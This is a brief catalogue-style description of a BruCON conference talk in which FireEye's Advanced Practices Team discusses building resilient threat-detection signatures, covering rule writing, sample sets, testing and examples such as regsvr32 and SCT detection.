Explore the intricacies of creating resilient, high-fidelity threat detections in this 57-minute conference talk from BruCON Security Conference. Delve into the challenges of developing signatures that withstand evasion attempts by dedicated attackers and researchers. Learn from FireEye's Advanced Practices Team as they share insights on their processes and approaches to detection development, including practical examples derived from real-world attacks. Discover the importance of proper tools, visibility, and a methodical, iterative approach in crafting effective detections. Gain valuable knowledge on various topics, including signature definition, detection methodologies, sample set assembly, existing protection testing, data generation, rule writing, and intelligence gathering. Examine specific examples such as register32 detection, FTP WebDAV, argument reordering, and HTTPS SCT Detection. Understand the attack lifecycle and the significance of knowing your tools and new application techniques in the ever-evolving landscape of cybersecurity. Read more